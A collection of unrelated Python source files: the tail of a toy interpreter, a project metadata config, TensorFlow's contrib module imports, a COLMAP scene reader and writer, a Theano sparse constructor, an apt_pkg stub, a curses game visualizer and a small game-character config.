if res.error: return res
value_to_call = value_to_call.copy().set_pos(node.pos_start, node.pos_end)
for arg_node in node.arg_nodes:
args.append(res.register(self.visit(arg_node, context)))
if res.error: return res
return_value = res.register(value_to_call.execute(args))
if res.error: return res
return res.success(return_value)
#######################################
# RUN
#######################################
global_symbol_table = SymbolTable()
global_symbol_table.set("NULL", Number(0))
global_symbol_table.set("FALSE", Number(0))
global_symbol_table.set("TRUE", Number(1))
def run(fn, text):
# Generate tokens
lexer = Lexer(fn, text)
tokens, error = lexer.make_tokens()
if error: return None, error
# Generate AST
parser = Parser(tokens)
ast = parser.parse()
if ast.error: return None, ast.error
# Run program
interpreter = Interpreter()
context = Context('<program>')
context.symbol_table = global_symbol_table
result = interpreter.visit(ast.node, context)
return result.value, result.error
|
import pyclassifiers.values
import config.general
import config.helpers
project_github_username = "veltzer"
project_name = "pyapikey"
github_repo_name = project_name
project_website = f"https://{project_github_username}.github.io/{project_name}"
project_website_source = f"https://github.com/{project_github_username}/{project_name}"
project_website_git = f"git://github.com/{project_github_username}/{project_name}.git"
project_website_download_ppa = "https://launchpanet/~mark-veltzer/+archive/ubuntu/ppa"
project_website_download_src = project_website_source
# project_paypal_donate_button_id="ASPRXR59H2NTQ"
# project_google_analytics_tracking_id="UA-56436979-1"
project_long_description = "access api keys from code"
project_short_description = project_long_description
# keywords to put on html pages or for search, dont put the name of the project or my details
# as they will be added automatically...
project_keywords = [
"api",
"key",
"python",
"secret",
]
project_license = "MIT"
project_year_started = "2020"
project_description = project_long_description
project_platforms = [
"python3",
]
project_classifiers = [
pyclassifiers.values.DevelopmentStatus__4_Beta,
pyclassifiers.values.Environment__Console,
pyclassifiers.values.OperatingSystem__OSIndependent,
pyclassifiers.values.ProgrammingLanguage__Python,
pyclassifiers.values.ProgrammingLanguage__Python__3,
pyclassifiers.values.ProgrammingLanguage__Python__3__Only,
pyclassifiers.values.ProgrammingLanguage__Python__36,
pyclassifiers.values.ProgrammingLanguage__Python__37,
pyclassifiers.values.ProgrammingLanguage__Python__38,
pyclassifiers.values.Topic__Utilities,
pyclassifiers.values.License__OSIApproved__MITLicense,
]
project_data_files = []
project_google_analytics_tracking_id = None
project_paypal_donate_button_id = None
codacy_id = None
project_copyright_years = config.helpers.get_copyright_years(project_year_started)
project_google_analytics_snipplet = config.helpers.get_google_analytics(project_google_analytics_tracking_id)
project_paypal_donate_button_snipplet = config.helpers.get_paypal(project_paypal_donate_button_id)
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""contrib module containing volatile or experimental code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Add projects here, they will show up under tf.contrib.
from tensorflow.contrib import bayesflow
from tensorflow.contrib import cloud
from tensorflow.contrib import compiler
from tensorflow.contrib import copy_graph
from tensorflow.contrib import crf
from tensorflow.contrib import cudnn_rnn
from tensorflow.contrib import data
from tensorflow.contrib import deprecated
from tensorflow.contrib import distributions
from tensorflow.contrib import factorization
from tensorflow.contrib import framework
from tensorflow.contrib import graph_editor
from tensorflow.contrib import grid_rnn
from tensorflow.contrib import image
from tensorflow.contrib import input_pipeline
from tensorflow.contrib import integrate
from tensorflow.contrib import keras
from tensorflow.contrib import kernel_methods
from tensorflow.contrib import labeled_tensor
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from tensorflow.contrib import legacy_seq2seq
from tensorflow.contrib import linalg
from tensorflow.contrib import linear_optimizer
from tensorflow.contrib import lookup
from tensorflow.contrib import losses
from tensorflow.contrib import memory_stats
from tensorflow.contrib import metrics
from tensorflow.contrib import nccl
from tensorflow.contrib import nn
from tensorflow.contrib import opt
from tensorflow.contrib import quantization
from tensorflow.contrib import resampler
from tensorflow.contrib import rnn
from tensorflow.contrib import saved_model
from tensorflow.contrib import seq2seq
from tensorflow.contrib import signal
from tensorflow.contrib import slim
from tensorflow.contrib import solvers
from tensorflow.contrib import sparsemax
from tensorflow.contrib import staging
from tensorflow.contrib import stat_summarizer
from tensorflow.contrib import stateless
from tensorflow.contrib import tensor_forest
from tensorflow.contrib import tensorboard
from tensorflow.contrib import testing
from tensorflow.contrib import tfprof
from tensorflow.contrib import timeseries
from tensorflow.contrib import tpu
from tensorflow.contrib import training
from tensorflow.contrib import util
from tensorflow.contrib.ndlstm import python as ndlstm
from tensorflow.contrib.remote_fused_graph import pylib as remote_fused_graph
from tensorflow.contrib.specs import python as specs
from tensorflow.python.util.lazy_loader import LazyLoader
ffmpeg = LazyLoader("ffmpeg",
globals(), "tensorflow.contrib.ffmpeg")
del LazyLoader
del absolute_import
del division
del print_function
|
# Author: True Price <jtprice at cs.unc.edu>
from collections import OrderedDict, defaultdict
from io import StringIO
from itertools import combinations
import os
import struct
from .camera import Camera
from .image import Image
import numpy as np
from .rotation import Quaternion
# -------------------------------------------------------------------------------
#
# SceneManager
#
# -------------------------------------------------------------------------------
class SceneManager:
INVALID_POINT3D = np.uint64(-1)
def __init__(self, colmap_results_folder, image_path=None):
self.folder = colmap_results_folder
if not self.folder.endswith("/"):
self.folder += "/"
self.image_path = None
self.load_colmap_project_file(image_path=image_path)
self.cameras = OrderedDict()
self.images = OrderedDict()
self.name_to_image_id = dict()
self.last_camera_id = 0
self.last_image_id = 0
# Nx3 array of point3D xyz's
self.points3D = np.zeros((0, 3))
# for each element in points3D, stores the id of the point
self.point3D_ids = np.empty(0)
# point3D_id => index in self.points3D
self.point3D_id_to_point3D_idx = dict()
# point3D_id => [(image_id, point2D idx in image)]
self.point3D_id_to_images = dict()
self.point3D_colors = np.zeros((0, 3), dtype=np.uint8)
self.point3D_errors = np.zeros(0)
# ---------------------------------------------------------------------------
def load_colmap_project_file(self, project_file=None, image_path=None):
if project_file is None:
project_file = self.folder + "project.ini"
self.image_path = image_path
if self.image_path is None:
try:
with open(project_file, "r") as f:
for line in iter(f.readline, ""):
if line.startswith("image_path"):
self.image_path = line[11:].strip()
break
except:
pass
if self.image_path is None:
print("Warning: image_path not found for reconstruction")
elif not self.image_path.endswith("/"):
self.image_path += "/"
# ---------------------------------------------------------------------------
def load(self):
self.load_cameras()
self.load_images()
self.load_points3D()
# ---------------------------------------------------------------------------
def load_cameras(self, input_file=None):
if input_file is None:
input_file = self.folder + "cameras.bin"
if os.path.exists(input_file):
self._load_cameras_bin(input_file)
else:
input_file = self.folder + "cameras.txt"
if os.path.exists(input_file):
self._load_cameras_txt(input_file)
else:
raise IOError("no cameras file found")
def _load_cameras_bin(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "rb") as f:
num_cameras = struct.unpack("L", f.read(8))[0]
for _ in range(num_cameras):
camera_id, camera_type, w, h = struct.unpack("IiLL", f.read(24))
num_params = Camera.GetNumParams(camera_type)
params = struct.unpack("d" * num_params, f.read(8 * num_params))
self.cameras[camera_id] = Camera(camera_type, w, h, params)
self.last_camera_id = max(self.last_camera_id, camera_id)
def _load_cameras_txt(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
camera_id = int(data[0])
self.cameras[camera_id] = Camera(
data[1], int(data[2]), int(data[3]), list(map(float, data[4:]))
)
self.last_camera_id = max(self.last_camera_id, camera_id)
# ---------------------------------------------------------------------------
def load_images(self, input_file=None):
if input_file is None:
input_file = self.folder + "images.bin"
if os.path.exists(input_file):
self._load_images_bin(input_file)
else:
input_file = self.folder + "images.txt"
if os.path.exists(input_file):
self._load_images_txt(input_file)
else:
raise IOError("no images file found")
def _load_images_bin(self, input_file):
self.images = OrderedDict()
with open(input_file, "rb") as f:
num_images = struct.unpack("L", f.read(8))[0]
for _ in range(num_images):
image_id = struct.unpack("I", f.read(4))[0]
q = Quaternion(np.array(struct.unpack("dddd", f.read(32))))
t = np.array(struct.unpack("ddd", f.read(24)))
camera_id = struct.unpack("I", f.read(4))[0]
name = b"".join(c for c in iter(lambda: f.read(1), b"\x00")).decode()
image = Image(name, camera_id, q, t)
num_points2D = struct.unpack("L", f.read(8))[0]
image.points2D = np.empty((num_points2D, 2))
image.point3D_ids = np.empty(num_points2D, dtype=np.uint64)
for j in range(num_points2D):
image.points2D[j] = np.array(struct.unpack("dd", f.read(16)))
image.point3D_ids[j] = np.array(struct.unpack("Q", f.read(8)))
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
def _load_images_txt(self, input_file):
self.images = OrderedDict()
with open(input_file, "r") as f:
is_camera_description_line = False
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
is_camera_description_line = not is_camera_description_line
data = line.split()
if is_camera_description_line:
image_id = int(data[0])
image = Image(
data[-1],
int(data[-2]),
Quaternion(np.array(list(map(float, data[1:5])))),
np.array(list(map(float, data[5:8]))),
)
else:
image.points2D = np.array(
[list(map(float, data[::3])), list(map(float, data[1::3]))]
).T
image.point3D_ids = np.array(list(map(np.uint64, data[2::3])))
# automatically remove points without an associated 3D point
# mask = (image.point3D_ids != SceneManager.INVALID_POINT3D)
# image.points2D = image.points2D[mask]
# image.point3D_ids = image.point3D_ids[mask]
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
# ---------------------------------------------------------------------------
def load_points3D(self, input_file=None):
if input_file is None:
input_file = self.folder + "points3D.bin"
if os.path.exists(input_file):
self._load_points3D_bin(input_file)
else:
input_file = self.folder + "points3D.txt"
if os.path.exists(input_file):
self._load_points3D_txt(input_file)
else:
raise IOError("no points3D file found")
def _load_points3D_bin(self, input_file):
with open(input_file, "rb") as f:
num_points3D = struct.unpack("L", f.read(8))[0]
self.points3D = np.empty((num_points3D, 3))
self.point3D_ids = np.empty(num_points3D, dtype=np.uint64)
self.point3D_colors = np.empty((num_points3D, 3), dtype=np.uint8)
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = np.empty(num_points3D)
for i in range(num_points3D):
self.point3D_ids[i] = struct.unpack("L", f.read(8))[0]
self.points3D[i] = struct.unpack("ddd", f.read(24))
self.point3D_colors[i] = struct.unpack("BBB", f.read(3))
self.point3D_errors[i] = struct.unpack("d", f.read(8))[0]
self.point3D_id_to_point3D_idx[self.point3D_ids[i]] = i
# load (image id, point2D idx) pairs
track_len = struct.unpack("L", f.read(8))[0]
data = struct.unpack("I" * (2 * track_len), f.read(2 * track_len * 4))
self.point3D_id_to_images[self.point3D_ids[i]] = np.array(
data, dtype=np.uint32
).reshape(track_len, 2)
def _load_points3D_txt(self, input_file):
self.points3D = []
self.point3D_ids = []
self.point3D_colors = []
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = []
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
point3D_id = np.uint64(data[0])
self.point3D_ids.append(point3D_id)
self.point3D_id_to_point3D_idx[point3D_id] = len(self.points3D)
self.points3D.append(list(map(np.float64, data[1:4])))
self.point3D_colors.append(list(map(np.uint8, data[4:7])))
self.point3D_errors.append(np.float64(data[7]))
# load (image id, point2D idx) pairs
self.point3D_id_to_images[point3D_id] = np.array(
list(map(np.uint32, data[8:]))
).reshape(-1, 2)
self.points3D = np.array(self.points3D)
self.point3D_ids = np.array(self.point3D_ids)
self.point3D_colors = np.array(self.point3D_colors)
self.point3D_errors = np.array(self.point3D_errors)
# ---------------------------------------------------------------------------
def save(self, output_folder, binary=True):
self.save_cameras(output_folder, binary=binary)
self.save_images(output_folder, binary=binary)
self.save_points3D(output_folder, binary=binary)
# ---------------------------------------------------------------------------
def save_cameras(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "cameras.bin" if binary else "cameras.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_cameras_bin(output_file)
else:
self._save_cameras_txt(output_file)
def _save_cameras_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.cameras)))
camera_struct = struct.Struct("IiLL")
for camera_id, camera in sorted(self.cameras.items()):
fid.write(
camera_struct.pack(
camera_id, camera.camera_type, camera.width, camera.height
)
)
# TODO (True): should move this into the Camera class
fid.write(camera.get_params().tobytes())
def _save_cameras_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Camera list with one line of data per camera:", file=fid)
print("# CAMERA_ID, MODEL, WIDTH, HEIGHT, PARAMS[]", file=fid)
print("# Number of cameras:", len(self.cameras), file=fid)
for camera_id, camera in sorted(self.cameras.items()):
print(camera_id, camera, file=fid)
# ---------------------------------------------------------------------------
def save_images(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "images.bin" if binary else "images.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_images_bin(output_file)
else:
self._save_images_txt(output_file)
def _save_images_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.images)))
for image_id, image in self.images.items():
fid.write(struct.pack("I", image_id))
fid.write(image.q.q.tobytes())
fid.write(image.tvec.tobytes())
fid.write(struct.pack("I", image.camera_id))
fid.write(image.name + "\0")
fid.write(struct.pack("L", len(image.points2D)))
data = np.rec.fromarrays(
(image.points2D[:, 0], image.points2D[:, 1], image.point3D_ids)
)
fid.write(data.tobytes())
def _save_images_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Image list with two lines of data per image:", file=fid)
print("# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME", file=fid)
print("# POINTS2D[] as (X, Y, POINT3D_ID)", file=fid)
print("# Number of images: {},".format(len(self.images)), file=fid)
print("# mean observations per image: unknown", file=fid)
for image_id, image in self.images.items():
print(image_id, file=fid)
print(" ".join(str(qi) for qi in image.q.q), file=fid)
print(" ".join(str(ti) for ti in image.tvec), file=fid)
print(image.camera_id, image.name, file=fid)
data = np.rec.fromarrays(
(
image.points2D[:, 0],
image.points2D[:, 1],
image.point3D_ids.astype(np.int64),
)
)
if len(data) > 0:
np.savetxt(fid, data, "%.2f %.2f %d", newline=" ")
fid.seek(-1, os.SEEK_CUR)
fid.write("\n")
# ---------------------------------------------------------------------------
def save_points3D(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "points3D.bin" if binary else "points3D.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_points3D_bin(output_file)
else:
self._save_points3D_txt(output_file)
def _save_points3D_bin(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", num_valid_points3D))
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
fid.write(struct.pack("L", point3D_id))
fid.write(self.points3D[point3D_idx].tobytes())
fid.write(self.point3D_colors[point3D_idx].tobytes())
fid.write(self.point3D_errors[point3D_idx].tobytes())
fid.write(struct.pack("L", len(self.point3D_id_to_images[point3D_id])))
fid.write(self.point3D_id_to_images[point3D_id].tobytes())
def _save_points3D_txt(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
array_to_string = lambda arr: " ".join(str(x) for x in arr)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "w") as fid:
print("# 3D point list with one line of data per point:", file=fid)
print("# POINT3D_ID, X, Y, Z, R, G, B, ERROR, TRACK[] as ", file=fid)
print("# (IMAGE_ID, POINT2D_IDX)", file=fid)
print("# Number of points: {},".format(num_valid_points3D), file=fid)
print("# mean track length: unknown", file=fid)
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
print(point3D_id, file=fid)
print(array_to_string(self.points3D[point3D_idx]), file=fid)
print(array_to_string(self.point3D_colors[point3D_idx]), file=fid)
print(self.point3D_errors[point3D_idx], file=fid)
print(
array_to_string(self.point3D_id_to_images[point3D_id].flat),
file=fid,
)
# ---------------------------------------------------------------------------
# return the image id associated with a given image file
def get_image_from_name(self, image_name):
image_id = self.name_to_image_id[image_name]
return image_id, self.images[image_id]
# ---------------------------------------------------------------------------
def get_camera(self, camera_id):
return self.cameras[camera_id]
# ---------------------------------------------------------------------------
def get_points3D(self, image_id, return_points2D=True, return_colors=False):
image = self.images[image_id]
mask = image.point3D_ids != SceneManager.INVALID_POINT3D
point3D_idxs = np.array(
[
self.point3D_id_to_point3D_idx[point3D_id]
for point3D_id in image.point3D_ids[mask]
]
)
# detect filtered points
filter_mask = point3D_idxs != SceneManager.INVALID_POINT3D
point3D_idxs = point3D_idxs[filter_mask]
result = [self.points3D[point3D_idxs, :]]
if return_points2D:
mask[mask] &= filter_mask
result += [image.points2D[mask]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
def point3D_valid(self, point3D_id):
return (
self.point3D_id_to_point3D_idx[point3D_id] != SceneManager.INVALID_POINT3D
)
# ---------------------------------------------------------------------------
def get_filtered_points3D(self, return_colors=False):
point3D_idxs = [
idx
for idx in self.point3D_id_to_point3D_idx.values()
if idx != SceneManager.INVALID_POINT3D
]
result = [self.points3D[point3D_idxs, :]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
# return 3D points shared by two images
def get_shared_points3D(self, image_id1, image_id2):
point3D_ids = set(self.images[image_id1].point3D_ids) & set(
self.images[image_id2].point3D_ids
)
point3D_ids.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = np.array(
[self.point3D_id_to_point3D_idx[point3D_id] for point3D_id in point3D_ids]
)
return self.points3D[point3D_idxs, :]
# ---------------------------------------------------------------------------
# project *all* 3D points into image, return their projection coordinates,
# as well as their 3D positions
def get_viewed_points(self, image_id):
image = self.images[image_id]
# get unfiltered points
point3D_idxs = set(self.point3D_id_to_point3D_idx.values())
point3D_idxs.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = list(point3D_idxs)
points3D = self.points3D[point3D_idxs, :]
# orient points relative to camera
R = image.q.ToR()
points3D = points3D.dot(R.T) + image.tvec[np.newaxis, :]
points3D = points3D[points3D[:, 2] > 0, :] # keep points with positive z
# put points into image coordinates
camera = self.cameras[image.camera_id]
points2D = points3D.dot(camera.get_camera_matrix().T)
points2D = points2D[:, :2] / points2D[:, 2][:, np.newaxis]
# keep points that are within the image
mask = (
(points2D[:, 0] >= 0)
& (points2D[:, 1] >= 0)
& (points2D[:, 0] < camera.width - 1)
& (points2D[:, 1] < camera.height - 1)
)
return points2D[mask, :], points3D[mask, :]
# ---------------------------------------------------------------------------
def add_camera(self, camera):
self.last_camera_id += 1
self.cameras[self.last_camera_id] = camera
return self.last_camera_id
# ---------------------------------------------------------------------------
def add_image(self, image):
self.last_image_id += 1
self.images[self.last_image_id] = image
return self.last_image_id
# ---------------------------------------------------------------------------
def delete_images(self, image_list):
# delete specified images
for image_id in image_list:
if image_id in self.images:
del self.images[image_id]
keep_set = set(self.images.iterkeys())
# delete references to specified images, and ignore any points that are
# invalidated
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
mask = np.array(
[
image_id in keep_set
for image_id in self.point3D_id_to_images[point3D_id][:, 0]
]
)
if np.any(mask):
self.point3D_id_to_images[point3D_id] = self.point3D_id_to_images[
point3D_id
][mask]
else:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
# camera_list: set of cameras whose points we'd like to keep
# min/max triangulation angle: in degrees
def filter_points3D(
self,
min_track_len=0,
max_error=np.inf,
min_tri_angle=0,
max_tri_angle=180,
image_set=set(),
):
image_set = set(image_set)
check_triangulation_angles = min_tri_angle > 0 or max_tri_angle < 180
if check_triangulation_angles:
max_tri_prod = np.cos(np.radians(min_tri_angle))
min_tri_prod = np.cos(np.radians(max_tri_angle))
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
image_ids = []
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
if image_set or min_track_len > 0:
image_ids = set(self.point3D_id_to_images[point3D_id][:, 0])
# check if error and min track length are sufficient, or if none of
# the selected cameras see the point
if (
len(image_ids) < min_track_len
or self.point3D_errors[point3D_idx] > max_error
or image_set
and image_set.isdisjoint(image_ids)
):
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# find dot product between all camera viewing rays
elif check_triangulation_angles:
xyz = self.points3D[point3D_idx, :]
tvecs = np.array(
[(self.images[image_id].tvec - xyz) for image_id in image_ids]
)
tvecs /= np.linalg.norm(tvecs, axis=-1)[:, np.newaxis]
cos_theta = np.array([u.dot(v) for u, v in combinations(tvecs, 2)])
# min_prod = cos(maximum viewing angle), and vice versa
# if maximum viewing angle is too small or too large,
# don't add this point
if np.min(cos_theta) > max_tri_prod or np.max(cos_theta) < min_tri_prod:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# apply the filters to the image point3D_ids
for image in self.images.values():
mask = np.array(
[
self.point3D_id_to_point3D_idx.get(point3D_id, 0)
== SceneManager.INVALID_POINT3D
for point3D_id in image.point3D_ids
]
)
image.point3D_ids[mask] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
# scene graph: {image_id: [image_id: #shared points]}
def build_scene_graph(self):
self.scene_graph = defaultdict(lambda: defaultdict(int))
point3D_iter = self.point3D_id_to_images.items()
for i, (point3D_id, images) in enumerate(point3D_iter):
if not self.point3D_valid(point3D_id):
continue
for image_id1, image_id2 in combinations(images[:, 0], 2):
self.scene_graph[image_id1][image_id2] += 1
self.scene_graph[image_id2][image_id1] += 1
|
from __future__ import absolute_import, print_function, division
import copy
import scipy.sparse
from theano.compile import shared_constructor, SharedVariable
from theano.sparse.basic import SparseType, _sparse_py_operators
class SparseTensorSharedVariable(_sparse_py_operators, SharedVariable):
dtype = property(lambda self: self.type.dtype)
format = property(lambda self: self.type.format)
@shared_constructor
def sparse_constructor(value, name=None, strict=False, allow_downcast=None,
borrow=False, format=None):
"""
SharedVariable Constructor for SparseType.
writeme
"""
if not isinstance(value, scipy.sparse.spmatrix):
raise TypeError("Expected a sparse matrix in the sparse shared variable constructor. Received: ",
value.__class__)
if format is None:
format = value.format
type = SparseType(format=format, dtype=value.dtype)
if not borrow:
value = copy.deepcopy(value)
return SparseTensorSharedVariable(type=type, value=value, name=name,
strict=strict, allow_downcast=allow_downcast)
|
# encoding: utf-8
# module apt_pkg
# from /usr/lib/python3/dist-packages/apt_pkg.cpython-35m-x86_64-linux-gnu.so
# by generator 1.145
"""
Classes and functions wrapping the apt-pkg library.
The apt_pkg module provides several classes and functions for accessing
the functionality provided by the apt-pkg library. Typical uses might
include reading APT index files and configuration files and installing
or removing packages.
"""
# no imports
from .object import object
class PackageRecords(object):
"""
PackageRecords(cache: apt_pkg.Cache)
Package Records contain information about packages. Those objects
can be used to retrieve information such as maintainer or filename
of a package. They can also be used to retrieve the raw records
of the packages (i.e. those stanzas stored in Packages files).
"""
def lookup(self, (packagefile, index)): # real signature unknown; restored from __doc__
"""
lookup((packagefile: apt_pkg.PackageFile, index: int)) -> bool
Changes to a new package
"""
return False
def __init__(self, cache): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
filename = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The filename of the package, as stored in the 'Filename' field."""
homepage = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The homepage of the package, as stored in the 'Homepage' field."""
long_desc = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The long description of the packages; i.e. all lines in the
'Description' field except for the first one."""
maintainer = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The maintainer of the package, as stored in the 'Maintainer' field."""
md5_hash = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The MD5 hash value of the package, as stored in the 'MD5Sum' field."""
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The name of the package, as stored in the 'Package' field."""
record = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The raw record, suitable for parsing by apt_pkg.TagSection."""
sha1_hash = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The SHA1 hash value, as stored in the 'SHA1' field."""
sha256_hash = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The SHA256 hash value, as stored in the 'SHA256' field."""
short_desc = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The short description of the package, i.e. the first line of the
'Description' field."""
source_pkg = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The name of the source package, if different from the name of the
binary package. This information is retrieved from the 'Source' field."""
source_ver = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""The version of the source package, if it differs from the version
of the binary package. Just like 'source_pkg', this information
is retrieved from the 'Source' field."""
|
"""
Examples:
visualizer.py
visualizer.py --map=gen/hz.txt --lm="py:lm_ai.Oscillating(frequency=5)" ghc:fickle.ghc ghc:miner.ghc
Controls:
ESC, q - quit
b - one step back
arrows - control interactive lm
any key - one step of non-interactive lm
"""
import random
import curses
import logging
import argparse
import os
import sys
import copy
import map_loader
import game
from game import GhostAI, Map, LambdaMan
from game import InteractiveLambdaManAI, set_interactive_lambda_man_direction
from log_context import log_context, decorate_handlers
MAX_HISTORY_SIZE = 100
DIRECTION_KEYS = [
curses.KEY_UP, curses.KEY_RIGHT, curses.KEY_DOWN, curses.KEY_LEFT]
def main():
# clear old log
with open('visualizer_debug.log', 'w'):
pass
logging.basicConfig(
level=logging.INFO,
format='%(levelname)8s:%(name)15s: %(message)s',
filename='visualizer_debug.log')
import ghc
ghc.logger.setLevel(logging.WARNING)
decorate_handlers()
parser = argparse.ArgumentParser()
parser.add_argument(
'--map', default='default_map.txt',
help='map file, relative to data/maps')
parser.add_argument('--lm', default='interactive:', help='lm spec')
parser.add_argument('ghost', nargs='*', help='ghost specs')
args = parser.parse_args()
if not args.ghost:
args.ghost = [
'py:GhostAI_Shortest',
'ghc:fickle.ghc',
]
print 'no ghosts specified, using', args.ghost
map = map_loader.load_map(args.map)
map.set_ai_specs(args.lm, args.ghost)
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
stdscr.keypad(1)
curses.start_color()
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_BLUE, curses.COLOR_BLACK)
ghost_colors = [curses.color_pair(i) for i in 2, 3, 4, 5]
try:
history = []
while not map.game_over():
history = history[-MAX_HISTORY_SIZE:]
for y in range(map.height()):
stdscr.addstr(y, 0, map.line_as_text(y))
for i, ghost in enumerate(map.ghosts):
idx = ghost.index % len(args.ghost)
if ghost.vitality != game.INVISIBLE:
stdscr.addstr(ghost.y, ghost.x, '=', ghost_colors[idx])
stdscr.addstr(
i, map.width() + 1,
'{} {}'.format(ghost.vitality, args.ghost[idx]), ghost_colors[idx])
#for i, ghost in enumerate(args.ghost):
stdscr.addstr(
len(map.ghosts) + 1, map.width() + 1,
'pill: {} '.format(map.remaining_power_pill_ticks()),
curses.color_pair(1))
stdscr.addstr(
len(map.ghosts) + 2, map.width() + 1,
'lives: {} '.format(map.lambdaman.lives),
curses.color_pair(1))
stdscr.addstr(map.height(), 0, "Tick {0} Score {1} ".format(
map.move_queue[0].next_move, map.lambdaman.score))
stdscr.refresh()
next_actor = map.move_queue[0]
if isinstance(next_actor, LambdaMan):
quit_game = False
rewind = False
if args.lm == 'interactive:':
while True:
c = stdscr.getch()
if c in (27, 113): # ESC, q
quit_game = True
break
if c == ord('b'):
rewind = True
break
if c in DIRECTION_KEYS:
set_interactive_lambda_man_direction(
DIRECTION_KEYS.index(c))
break
stdscr.addstr(map.height()+1, 0, "Unknown key {}".format(c))
stdscr.refresh()
else:
c = stdscr.getch()
if c in (27, 113): # ESC, q
quit_game = True
elif c == ord('b'):
rewind = True
if quit_game:
break
if rewind:
if not history:
stdscr.addstr(map.height()+1, 0, 'no more history')
stdscr.refresh()
else:
map = history.pop()
continue
history.append(copy.deepcopy(map))
with log_context('step'):
map.step()
finally:
curses.nocbreak()
stdscr.keypad(0)
curses.echo()
curses.endwin()
print "Tick {0} Score {1}".format(map.current_tick,
map.lambdaman.score)
if __name__ == '__main__':
main()
|
from core.advbase import *
from slot.a import *
def module():
return Aldred
class Aldred(Adv):
comment = 'maintain dragondrive'
conf = {}
conf['slots.a'] = Heralds_of_Hinomoto()+Dear_Diary()
